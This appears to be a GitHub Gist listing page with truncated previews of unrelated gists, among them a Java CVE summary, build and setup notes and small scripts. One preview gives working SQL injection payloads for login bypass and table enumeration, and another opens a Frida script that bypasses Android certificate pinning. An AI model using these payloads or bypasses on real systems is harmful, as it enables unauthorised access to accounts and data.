Vulnerability Summary: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specifie
win3zz
/ CVE-2023-21939.md
Created
August 27, 2023 12:33
CVE-2023-21939 - Code Exec - Proof of Concept
alvinhochun
/ cfguard-for-mingw-w64.md
Last active
October 29, 2023 08:31
Control Flow Guard (CFG/CFGuard) for mingw-w64
Control Flow Guard is a security mitigation that verifies the target address of indirect calls. It works by having the compiler insert a check at indirect call sites to verify the validity of the call target, and also the linker write the necessary data and flags into the PE/COFF image to enable the feature on Windows' end.
danleyb2
/ Program.cs
Created
August 21, 2022 07:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| using HttpMultipartParser; | |
| namespace WebhookReceiver | |
| { | |
| internal class HttpServer |
ANRCorleone
/ readme.txt
Last active
May 22, 2024 02:07
— forked from krisalyssa/readme.txt
Ubuntu 22.04 + Hyper V + Enhanced Session mode + XRDP PulseAudio
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Credits | |
| # https://c-nergy.be/blog/?p=13655 | |
| # https://askubuntu.com/questions/844245/how-to-compile-latest-pulseaudio-with-webrtc-in-ubuntu-16-04 | |
| # https://askubuntu.com/questions/496549/error-you-must-put-some-source-uris-in-your-sources-list | |
| # https://unix.stackexchange.com/questions/65167/enable-udev-and-speex-support-for-pulseaudio | |
| # https://rudd-o.com/linux-and-free-software/how-to-make-pulseaudio-run-once-at-boot-for-all-your-users | |
| # https://gist.github.com/rkttu/35ecab5604c9ddc356b0af4644d5a226 | |
| # Installation and Enhanced session | |
| # follow steps on the post below, I installed Ubuntu 22.04 on a Windows 11 machine |
fernandoherreradelasheras
/ smart-video-cutter.sh
Created
February 26, 2022 17:01
Smart video cutter with minimal transcoding using ffmpg
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/bash | |
| # | |
| # Cut a fragment of a video with the minimal possible re-encoding. | |
| # If the new start point is not a key frame it reencodes the video | |
| # from that point until the frame before a new keyframe. The remaining | |
| # part is copied as passthrough and both fragments are concatenated | |
| # | |
| # In order to make the video streams compatible we use the same codec | |
| # and bitrate. This works fine with h264. No idea about other codecs |
dustinbutterworth
/ sqli-union-login.txt
Last active
January 31, 2022 11:30
SQLi UNION For Login Bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| username=' UNION SELECT "butters" as password FROM admins WHERE '1' = '1 | |
| password=butters | |
| username=foo' OR (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1 | |
| shows table name admin | |
| username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1 | |
| gives id row | |
| username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1 | |
| gives username row |
akabe1
/ frida_multiple_unpinning.js
Last active
June 9, 2024 04:11
Another Android ssl certificate pinning bypass for various methods
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Android ssl certificate pinning bypass script for various methods | |
| by Maurizio Siddu | |
| Run with: | |
| frida -U -f <APP_ID> -l frida_multiple_unpinning.js [--no-pause] | |
| */ | |
| setTimeout(function() { | |
| Java.perform(function() { | |
| console.log(''); |
ulidtko
/ qnap-qts-fw-cryptor.py
Last active
May 10, 2024 14:18
QNAP QTS firmware encryptor/decryptor.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import os, sys | |
| import argparse | |
| import struct | |
| from functools import reduce | |
| """ | |
| QNAP QTS firmware encryptor/decryptor. | |
| Based on https://pastebin.com/KHbX85nG |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # How to create systemd services: http://neilwebber.com/notes/2016/02/10/making-a-simple-systemd-file-for-raspberry-pi-jessie/ | |
| # Digital ocean on a mongodb service: https://www.digitalocean.com/community/tutorials/how-to-install-mongodb-on-ubuntu-16-04 | |
| [Unit] | |
| Description=Run SystemD as users | |
| After=network.target | |
| [Service] | |
| Type=simple | |
| User=[USER HERE] | |
| WorkingDirectory=[USER HOME] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from bs4 import BeautifulSoup | |
| import re | |
| for a in xrange(1,5): | |
| for b in xrange(1,21): | |
| path="html/"+str(a)+"_"+str(b)+".html" | |
| soup = BeautifulSoup(open(path),"lxml") | |
| span=soup.find_all(id=re.compile("Label")) | |
| for i in span: | |
| #print i.get("id") |
NewerOlder